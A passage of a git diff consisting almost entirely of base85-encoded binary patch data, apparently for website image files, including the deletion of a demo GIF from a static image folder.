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 YtagqTsmH>k2qu7>l(J;GxS`+w0PEBg9{>OV diff --git a/website/src/static/img/demo-large.gif b/website/src/static/img/demo-large.gif deleted file mode 100644 index 9e6bedb234f2e40aec5db55108eda31cf0468bbd..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 4767847 zcmWh!Wl+>#7v2u?M>i~u2uQcM%Mwc|9TL(F(xMW(%hDYRBH$9zBB_W)HwX%d3QCKF zf}jE-`~KfKAI{8~J7?y8IOjgkGtV_NGEmoW<3=#R{#b)}1w_=;G@rg6d^+XoSYtox>VxZ$RITc3uw#B^@?JM{GpVqJ=F7q$dASlWf;KA5h(6B8xL z$1ylM^KfjY@NQ9S|2)~%R7hA#Ske4(Spf?ROKa@|JOA57O#@%wv{74U-cJtKfW>e?<| zYpxyLXAE3@JMdWE|1pFA=iua@Q5}W5yKhUrG)Bz!$oE<{9E=S8JChx@>hE|QY=ev0 z%%T2laBB|nulV(3=8xPf^9bsj@x}wSMdy+a%|n}~G#c&Tbp@0=W;d|j9u{P1)5!_SS~quqmF zSM8m@e?Q#Z+}hpQw{i})bn-tsKFtlVIon;dy6U<3>+E=Qe&PGs+4r@@f3({VdT3{V z&VKLE{?a~w+4yrtqa7~NXea;v{_1_d!!DwFxH`JMvp@gsZ~v!1v!A|h@BHkX{XO>i z*W&WV>-Rs`|NI(Tqy0Uhot~ad%)jHyfRAH*tLH z{9ikT5$hknX>z01@}ss&6Lx=&XeYIH4a2b;h7)UTsO{PKjaJ@+Hy+2u=>J0mLeW5VD1JgS zwI>0^ChaubT;7)qh#Hp=S}F$8xt07EhFdC!vN8BHexuf^k$fqudZ&@rhhv5E9-}2j zZPgR^)x))zFvR~nZZcht`|*thvFj&?M>f9%?q zCSdZU@k5*MyL#ubCyzco4Oty6HF?^!_&oYxYjN!9<1ep?P8M>;M#Od(blctW-f%5FY z+RSfShmMII?yZhJxboVU7j(4mGkjIzQrzB8ubwj99S-{`v9{ToB{GBRuqCGhHK&Kd zZtJ_8$kp}pL+sgZvQ7M1Ecgo-bHP#KE#$v_A_xMC1|-A>rB*YPC!@;})HiBH6CAi# zzGPz&$Cb&Y{}jaHFQuh?hI=X33F|f$kaT&N#R?4a?Y-;P?^<4V803O}m)a=uRJ}pW z@vSzh^6Ef)dL~Ox$PL0mv6>Bp^^-`hW4-*%wK)-V|v%5~k{;*#vT zzahEueB@%tW&@%Fvk5;Gyw&pxbYo|KC=P8Jf=8Ixet$^MHX|R$?5H+Ml{(#*dqA$p zGnbS9LjQA8`wv6m@NT)uhY`954Pkln%WuW$R=N9K zEy0Vv2(W$`mbQ2&nvTe*>j_KmRYdb>ZF1R%2mM)$R$7mA5@(|+Q>RehOa=n^-y=eC zdQhUDUh*63s5n{Qa`+M?^RJ8ErfTqX;KN8cAPs|4&sk#gYhr03Dc%NN-JjP|UvlWz z+7!C^KKSo0ZZ~L}*YoiEUwrn__rFpwOBM#P*pGkp<(NW+wRy(b+6TED;#v^b#~GDl zf2wKcBw_QNvH-c>bZLO=yV+ZKeyombtZwRsCUZGIu?t@GQ+M?Y=zrgi|A))|`(_EH zo8(nag>T#z&@;fN$;~svys%67vOno$*qb;nDKHNK2bUuT3untuiJqC0WtQJyDx+N% 